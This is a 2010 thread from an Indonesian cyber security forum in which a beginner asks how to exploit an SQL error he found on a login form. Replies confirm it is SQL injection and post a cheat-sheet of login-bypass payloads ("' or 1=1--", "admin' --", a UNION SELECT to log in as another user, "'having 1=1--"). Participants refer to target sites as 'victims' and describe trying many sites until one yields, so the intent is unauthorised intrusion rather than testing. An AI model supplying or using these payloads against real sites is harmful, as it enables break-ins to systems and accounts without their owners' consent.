Cyber Security Forum (X-code) - PT. Teknologi Server Indonesia

The largest cyber security forum in Indonesia with more than 129000 members
http://xcode.or.id/forum/

Pesen Om PONI

http://xcode.or.id/forum/viewtopic.php?f=99&t=39697

Page 1 of 1

Pesen Om PONI

Posted: Sat Jun 26, 2010 11:02 pm
by RJ-45
Karena disuruh om poni suruh nanyain diforum makanya saya tanyakan disin saja kakak2 yang baik hati tidak sombong dan rajin menabung......

numpang tanya kakak...
kalau pada form loginnya kita isikan ' pada username n password kosong kok muncul pesan error begini ya??

Code: Select all

Error !!!


You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1
itu memungkinkan buat di inject g kakak? lo bisa caranya gmana??
mohon maaf lo banyak tanya,

Re: Pesen Om PONI

Posted: Mon Jun 28, 2010 8:19 pm
by poni
itu bug sqli. bisa di inject. tutor sqli kan banyak di forum..

Re: Pesen Om PONI

Posted: Mon Jun 28, 2010 11:30 pm
by RJ-45
hehehe...
pi ku bingung mas lo nginjectnya lewat form....
maklum newbie banget.....
:maaf: :maaf: :maaf: :maaf: :maaf: :maaf: :maaf:

Re: Pesen Om PONI

Posted: Sun Jul 04, 2010 9:45 am
by Darkzzzz
Lah kan bang poni udah bikin tutor Havij & Sql Helper...
Dicoba aja...

Re: Pesen Om PONI

Posted: Tue Jul 06, 2010 2:42 am
by RJ-45
Lo pake tool malah mebingunkan kakak, wong yang mau di inject tu form loginnya......

Re: Pesen Om PONI

Posted: Tue Jul 06, 2010 9:40 pm
by Darkzzzz
Owh....
SQL Injection 101, Login tricks

admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--

* Login as different user (SM*)
' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--

*Old versions of MySQL doesn't support union queries
Sumber : http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
Referensi : http://www.securiteam.com/securityreviews/5DP0N1P76E.html

Re: Pesen Om PONI

Posted: Mon Jul 12, 2010 11:48 pm
by b0c4h
Darkzzzz wrote:Owh....
SQL Injection 101, Login tricks

admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--

* Login as different user (SM*)
' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--

*Old versions of MySQL doesn't support union queries
Sumber : http://ferruh.mavituna.com/sql-injectio ... sheet-oku/
Referensi : http://www.securiteam.com/securityrevie ... 1P76E.html
mw nambahin atu ya omz darkzzzz....
bs jg pk : 'having 1=1--

.thx.

Re: Pesen Om PONI

Posted: Wed Jul 14, 2010 1:41 pm
by RJ-45
hahahaha udah aku coba yang itu om.. dah aku coba pake add onnya mozilla ada 100 an lebih malahan tu.. tetep nihil...

Re: Pesen Om PONI

Posted: Thu Jul 15, 2010 2:02 am
by b0c4h
RJ-45 wrote:hahahaha udah aku coba yang itu om.. dah aku coba pake add onnya mozilla ada 100 an lebih malahan tu.. tetep nihil...
ahhh,,,ms sih kk....kmrn sy ga nympe 100 koq...tp msh da j web yg vuln pk teknik ky gtu....
kmrn sy yg pk 'having 1=1-- sm bypass login 'or 1=1-- ......
yg sabar j kk....jika saat'a tiba, pasti akan datang juga....(haalaaaahhhh....bahasa uoopoooo kuiii....kbanyakan nonton sinetron ki....wkwkwkkwkw...:D...)

.thx.

Re: Pesen Om PONI

Posted: Fri Jul 16, 2010 9:03 pm
by RJ-45
heheh coz korbannya cuma satu....
lo 100 korban past ada yang bisa.. hehehehe
All times are UTC+07:00
Page 1 of 1
Powered by phpBB® Forum Software © phpBB Limited
https://www.phpbb.com/